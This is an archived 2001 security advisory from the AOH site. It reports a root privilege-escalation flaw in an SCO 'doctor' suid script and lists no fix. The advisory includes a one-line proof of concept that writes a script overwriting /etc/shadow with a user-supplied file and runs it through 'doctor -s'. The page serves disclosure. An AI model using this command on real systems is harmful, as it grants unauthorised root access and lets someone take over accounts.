AOH :: SCO :: SCO4953.HTM

AOH :: SCO :: SCO4953.HTM
doctor suid script vulnerability

24th Dec 2001 [SBWID-4953]

COMMAND

	doctor suid script vulnerability

SYSTEMS AFFECTED

	doctor v . ??

PROBLEM

	Kitwor [http://www.promocja.kki.pl/wirus] posted to securitybugware :
	

	You can execute any command with root priv:
	

	Example: $ echo  \"cat  my_shadow_file  >  /etc/shadow\"  >  ./script  $
	doctor -s ./script

SOLUTION

	Nothing yet.

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.